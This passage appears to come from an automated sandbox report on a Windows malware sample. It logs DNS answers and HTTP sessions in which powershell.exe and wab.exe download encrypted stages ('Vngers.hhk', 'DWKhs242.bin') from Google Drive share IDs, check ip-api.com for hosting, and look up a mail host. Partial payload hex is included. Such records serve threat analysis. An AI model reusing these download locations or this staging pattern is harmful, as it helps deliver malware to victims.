Apr 24, 2024 06:46:57.285806894 CEST | 1.1.1.1 | 192.168.2.9 | 0x9106 | No error (0) | drive.google.com | | 142.250.101.101 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:46:57.285806894 CEST | 1.1.1.1 | 192.168.2.9 | 0x9106 | No error (0) | drive.google.com | | 142.250.101.102 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:47:00.728956938 CEST | 1.1.1.1 | 192.168.2.9 | 0x703c | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 06:47:03.453811884 CEST | 1.1.1.1 | 192.168.2.9 | 0x46a4 | No error (0) | mail.cash4cars.nz | | 114.142.162.17 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49714 | 208.95.112.1 | 80 | 316 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 06:47:00.893723965 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 24, 2024 06:47:01.053816080 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Apr 2024 04:47:00 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49706 | 142.250.101.113 | 443 | 4632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 04:46:08 UTC | 215 | OUT | GET /uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Connection: Keep-Alive
2024-04-24 04:46:08 UTC | 1582 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 24 Apr 2024 04:46:08 GMT
Location: https://drive.usercontent.google.com/download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'nonce-7PMQZa6iNPZCly1vgT8qvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49707 | 142.251.2.132 | 443 | 4632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 04:46:09 UTC | 233 | OUT | GET /download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-04-24 04:46:10 UTC | 4742 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: ABPtcPonXb5GegoztR2eFcTMupXY6M-Fkr9BnhdDCUPXa-WU2ErGRQ1Sk8ccrGP-t786GM5Dbtc
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Vngers.hhk"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 435476
Last-Modified: Wed, 24 Apr 2024 01:18:01 GMT
Date: Wed, 24 Apr 2024 04:46:10 GMT
Expires: Wed, 24 Apr 2024 04:46:10 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=/63KXw==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.9 | 49711 | 142.250.101.113 | 443 | 316 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-24 04:46:57 UTC | 216 | OUT | GET /uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          2024-04-24 04:46:58 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Wed, 24 Apr 2024 04:46:57 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-WAZaJOgIBWZkW0CZXIlOPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.2.9 | 49712 | 142.251.2.132 | 443 | 316 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-24 04:46:58 UTC | 258 | OUT | GET /download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          2024-04-24 04:46:59 UTC | 4744 | IN | HTTP/1.1 200 OK
                                                                          X-GUploader-UploadID: ABPtcPqMhVMxayIs-uns-kmlIW3i0H2v2SN3tD21_m0liOQMpeRclxbffnVym36aqjhAYweX1ss
                                                                          Content-Type: application/octet-stream
                                                                          Content-Security-Policy: sandbox
                                                                          Content-Security-Policy: default-src 'none'
                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                          X-Content-Security-Policy: sandbox
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Resource-Policy: same-site
                                                                          X-Content-Type-Options: nosniff
                                                                          Content-Disposition: attachment; filename="DWKhs242.bin"
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 244800
                                                                          Last-Modified: Wed, 24 Apr 2024 01:15:42 GMT
                                                                          Date: Wed, 24 Apr 2024 04:46:59 GMT
                                                                          Expires: Wed, 24 Apr 2024 04:46:59 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Goog-Hash: crc32c=2n0xsg==
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-04-24 04:46:59 UTC4744INData Raw: 52 0f 83 58 e7 47 bc d7 6e 25 0e 2c fe ee dc 66 40 d1 6b 10 b2 bc 33 fb 0e ea 21 74 01 e2 32 05 be 86 e3 19 96 6e 40 1e 09 5b c6 d3 11 cb f1 50 17 a1 c1 49 f5 4a 35 20 43 db 84 ee d5 fc 36 ac 2c 88 4d ce 1f c8 fd f4 4d 8d c9 51 3a 29 08 b7 1c 92 f8 ea 39 38 1d 92 80 00 77 5c a3 a9 cf 09 e0 b8 2b 41 c0 f4 41 ec 64 55 cc 2b ea 3d f5 11 64 b6 3e 34 56 6a 4f 5e 8a a8 83 21 11 72 cf ff 6d 02 6d 70 1e f6 4f 66 75 54 aa a4 b6 32 1c 01 48 14 0b 42 e2 47 dd 72 6b 8a f2 23 4e cd 00 ab 45 b7 ee 5d 9c ad bc 26 f4 ae 97 d9 fb 17 23 55 7c 2a f7 da f7 9b 8f c0 ee e5 5b 33 57 95 7e 51 22 f9 88 7a 1a 53 b5 78 9c 60 b7 27 f1 13 1d a5 dd 94 32 b0 ef b6 88 cc dd 70 e2 61 7a a0 47 1c 94 93 2a 85 3f 8e 7f 55 73 c6 8a f6 b6 00 c1 9d 7e 54 8f ab 6b 8c ab 1b e5 e0 e4 32 b5 8b 26
                                                                          Data Ascii: RXGn%,f@k3!t2n@[PIJ5 C6,MMQ:)98w\+AAdU+=d>4VjO^!rmmpOfuT2HBGrk#NE]&#U|*[3W~Q"zSx`'2pazG*?Us~Tk2&
                                                                          2024-04-24 04:46:59 UTC4744INData Raw: b4 72 aa 52 82 eb 1b e5 e8 ec 30 b5 8f 06 96 47 9c 62 98 7a df 42 45 cc c3 88 ca 7d 3b d4 49 37 3b 9d 94 b7 32 f3 2c 8b c1 8d da cf bf 06 98 ce 60 04 6b 7e 89 7c 46 29 5b 18 fa 03 e4 21 6f 1f 24 65 1c 78 88 06 1c 58 9f 56 9b d9 13 6d 8e 85 8f 2f d8 36 9c 08 1a 98 ad 29 00 ed 87 4e 14 40 2d d3 32 e1 d1 1e e2 b0 e7 4b 43 c3 42 2c ab 1b 81 c4 cd ce 4c 3f ea 9e 7b de bf 55 79 c5 54 5a 19 f5 5e 87 9a 5d b2 f4 46 9c 7d 68 2e 8b c1 bd 45 3b 28 4f f7 70 2f 43 f5 49 22 c9 f9 8e 32 fe f0 4d a8 6a bd 91 7d 44 0f 35 17 88 33 8d 82 94 33 62 75 c4 d6 b9 15 88 92 c8 c8 c6 33 e9 5f 29 11 30 17 49 34 e0 a0 85 eb a0 78 f9 b4 cb 6e 2f 5b 79 54 0a 93 8a 95 62 f7 31 9f 7e 67 f0 21 4f e6 0e be 8f c0 2e 2c 09 6e b2 00 9b 5a 91 ef 74 32 af 04 21 d9 02 aa 75 88 bc d8 8c 42 d0 c4
                                                                          Data Ascii: rR0GbzBE};I7;2,`k~|F)[!o$exXVm/6)N@-2KCB,L?{UyTZ^]F}h.E;(Op/CI"2Mj}D533bu3_)0I4xn/[yTb1~g!O.,nZt2!uB
                                                                          2024-04-24 04:46:59 UTC467INData Raw: ae 0f 21 d9 02 aa 0e 72 43 27 86 4b e0 c2 cb 5d 9b 54 14 f7 c1 43 aa b8 bf 55 00 bc 1b 53 c9 71 a3 cf 4d 8d 01 f8 ac 33 a9 84 4b 5f ea 7a ea 4f da 36 a3 cc 19 e7 9f ea 8e cf 5a c7 01 ec 9b 79 db 6d 12 19 5a 82 19 c1 d1 a6 64 4f 48 63 91 dd 86 cb 42 1c 2c 62 f3 27 03 ef ec 56 56 89 76 6d 7c d1 92 3b 80 9f 2a 62 64 1a a5 28 72 08 0e dd eb 57 b3 6e 1e 53 2b 4d b7 6b 23 f1 3f 38 1d 5c a2 52 e2 78 1d 1f 8c bf 1a af 30 0f e5 df 60 53 a4 98 29 dc 2a 3d c4 ea 06 80 71 1f 86 41 63 7f 54 c9 0f 54 93 e7 27 8d 6d 9f 3b 0f d0 cf d8 43 dd 1d 06 e0 61 1a c6 e7 7c f7 a9 df c4 b7 10 45 f7 d8 b1 a8 c2 83 5d ef 72 ea 22 97 d2 f8 5e f1 02 51 a5 47 c2 5a 2f 20 1d af 78 bc 9c 10 b0 83 85 5c 85 31 50 d5 ae 29 2c 04 e2 f6 d1 9f 5f b7 2b ed 07 a3 97 45 50 1d 3a e6 a5 88 31 0c 11
                                                                          Data Ascii: !rC'K]TCUSqM3K_zO6ZymZdOHcB,b'VVvm|;*bd(rWnS+Mk#?8\Rx0`S)*=qAcTT'm;Ca|E]r"^QGZ/ x\1P),_+EP:1
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: 3a bf d2 43 ca 86 af 4c 7a 8d 03 07 74 f4 54 06 b1 e7 8a 9c f6 94 98 e2 07 ac 6b cd 8e 61 c5 21 8d f6 cc e4 a1 6e 72 f8 82 4a 52 2d 66 f9 c7 bc 6f c1 00 3e 4c f4 ef b7 93 e1 db 71 93 b8 38 85 2e 45 7d b2 58 2e 9b 2f a2 69 e6 f0 1a bc 28 8a 46 75 f9 e7 ab 1e ae 78 a0 b1 65 69 7d 96 d2 f3 fe 67 38 9f 6a e3 de a1 77 28 be 05 dc 97 62 95 b1 8f 49 f1 63 f0 40 9f 0d 26 24 6c 03 05 e9 0a 76 2f 12 c2 e8 4b eb ea 37 3a af 2b d3 9a ed 9c 82 58 f8 6a 71 52 29 36 00 95 65 dd 54 60 67 cc e0 5c 2b ff 04 c9 07 74 70 24 12 aa d9 a5 b7 dc 18 36 f0 9f ce b2 68 33 c2 84 90 5b 39 da 6b e1 a5 39 32 d0 0b 71 2b 07 5a 1a 53 69 44 b0 4f a7 c2 ea d5 e6 a7 75 06 54 d1 b8 90 47 2a 5d 5d 55 9b cf 28 05 53 2d 75 95 60 e9 b5 bb a6 fe d7 83 2e 6d b9 81 1f 4d 45 7e d2 0d e8 d6 90 64 fb
                                                                          Data Ascii: :CLztTka!nrJR-fo>Lq8.E}X./i(Fuxei}g8jw(bIc@&$lv/K7:+XjqR)6eT`g\+tp$6h3[9k92q+ZSiDOuTG*]]U(S-u`.mME~d
                                                                          2024-04-24 04:46:59 UTC67INData Raw: 15 b0 83 88 61 c3 4f 77 d5 50 21 d8 08 a2 fb be c6 5f f1 21 13 0b 87 68 d5 f5 d2 3b ec 78 27 cc f3 ee ca 35 d0 d9 4b bd 93 62 a7 0c fb f7 9b fd 3e 81 c8 d8 7e 59 ea d6 4a 85 0e 38 ea 34 22 a8 3d 52 c2
                                                                          Data Ascii: aOwP!_!h;x'5Kb>~YJ84"=R
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: c8 e2 06 12 db e1 71 48 a8 8b 0f d5 89 47 21 7f f4 e1 8a 51 b7 be 19 06 5c 68 13 91 3e 0d 56 11 82 0c 18 d2 d6 ec 60 69 ef b2 0a 61 a0 bb 56 f3 d1 7a 99 47 93 5d fc b4 46 2e 82 0f b4 d5 bd bb 35 30 f1 28 0a 58 26 bd 89 48 3d 6b ae 48 dc 91 63 55 96 58 11 ee 2f 85 88 73 1e 49 4c df 9d 95 49 24 e6 38 e8 33 10 4a 9f 21 1c 09 e7 93 2e 6f be 3b 20 67 70 24 ae 62 72 95 1c 20 44 e2 c1 f3 6e c8 cb a4 a0 b1 97 a8 b6 07 d6 7e 8e 51 73 0f c2 9e 55 ab fb 36 01 96 ea 3c 3e 25 5e f6 b1 0a e3 99 97 d1 54 89 2f 11 bb 0c 1a 7d 00 7c 31 07 7f df 92 32 b5 c2 43 d1 b6 c7 14 3e cf 03 07 76 0a 5a 13 91 c7 8f 9c f6 6a 68 ed 0b 94 5a 33 82 6d c5 ff 86 f7 cc c4 5f 6f 4b f6 7c 4b 6b 1f cc 05 38 43 6f c8 00 3e 4c f4 ef ba 93 e1 db 71 9e b8 38 89 2e 45 7d b2 58 2e 90 2f a2 69 e6 c5
                                                                          Data Ascii: qHG!Q\h>V`iaVzG]F.50(X&H=kHcUX/sILI$83J!.o; gp$br Dn~QsU6<>%^T/}|12C>vZjhZ3m_oK|Kk8Co>Lq8.E}X./i
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: 53 5f e0 52 01 41 d6 3c 5d 3c 16 eb 61 c7 83 cf 72 a3 ff ed a8 9c d7 6d 12 be 76 8c 19 e9 ed cc 58 4b c4 20 91 fd 86 35 4c 1c d2 4c fd 27 de bf 12 58 5a 54 70 93 70 dd b4 c6 95 9f 2a 62 ba 1b 9c 26 72 22 2e e7 35 54 b3 90 30 41 2b 4d 49 99 29 fd 1f 38 e3 50 ae ac c3 60 17 1f 8c 41 1b b6 27 0f e5 df 60 51 a9 98 46 1f 26 39 ce 34 0a 80 71 3f 5a 40 5a 7a aa c7 03 6c 96 19 2b 81 55 f0 c6 f0 2f 31 2a 43 e4 17 07 f0 61 e4 ca e6 63 98 c2 ab c4 bb 63 87 f4 d9 d2 f7 fe 83 69 e7 8c e4 2c 97 f2 ea 7e f1 02 af ab b5 cc 5e d1 14 ef ae 58 ba 9c ee bc 79 84 45 c5 31 50 d5 ae 24 1f 1c a7 fb d1 61 53 f3 2b cd 03 83 68 ba dd d7 3e e6 d5 83 ec f4 ee ec e8 2e d7 4f bd ed be ab 08 ff ff 6b fc 3e 87 1c d9 47 4e ab b2 4a 7b 03 3b ea 1c 91 a8 3d 58 7d 73 e3 06 49 fa ed 71 4e a8
                                                                          Data Ascii: S_RA<]<armvXK 5LL'XZTpp*b&r".5T0A+MI)8P`A'`QF&94q?Z@Zzl+U/1*Cacci,~^XyE1P$aS+h>.Ok>GNJ{;=X}sIqN
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: f3 2c f5 e8 ad d9 cb d0 58 66 c0 61 24 66 80 85 7b b8 07 5a 18 fa fd 16 20 56 28 2f 65 1c 0a 05 01 25 3b ec 26 9b aa 44 93 80 83 0f 0c da 36 98 28 e8 96 aa 29 fe 1d 8b 49 14 9e 21 d3 32 c1 27 1f db ba 19 4a 7a d0 62 2d ab 68 d3 3a c3 cf cc 3d 14 92 78 fe 96 56 79 c5 aa aa 18 cc 5b 79 96 5d 8a d1 43 9c 7d 50 70 77 07 4c bb 37 2c 67 fe 70 6e 39 d5 4f 20 c9 f9 70 05 fe f0 4d 9c 66 bd 91 5e 46 0f 35 04 76 32 b4 91 94 33 62 5f ee d6 b9 3f b1 45 37 d8 39 13 ed 44 28 11 ce 0a 49 34 e0 5e 89 eb a0 58 f9 b4 cb 71 d1 5a 40 4a 0b 93 8a a6 43 f6 31 90 7e 99 fe 20 4f e6 f1 b0 8f c0 0e 3e 09 6e b2 d6 9b 63 94 a8 75 32 97 12 21 d9 02 92 46 76 43 25 a6 51 e0 b5 ca a3 95 2f 14 f7 3f a1 a7 b8 9f 51 00 bc 1b ad c8 48 ad dc 7d 8e 39 c8 a9 33 a9 aa 53 5f fb 5a 14 41 d6 36 5d
                                                                          Data Ascii: ,Xfa$f{Z V(/e%;&D6()I!2'Jzb-h:=xVy[y]C}PpwL7,gpn9O pMf^F5v23b_?E79D(I4^XqZ@JC1~ O>ncu2!FvC%Q/?QH}93S_ZA6]
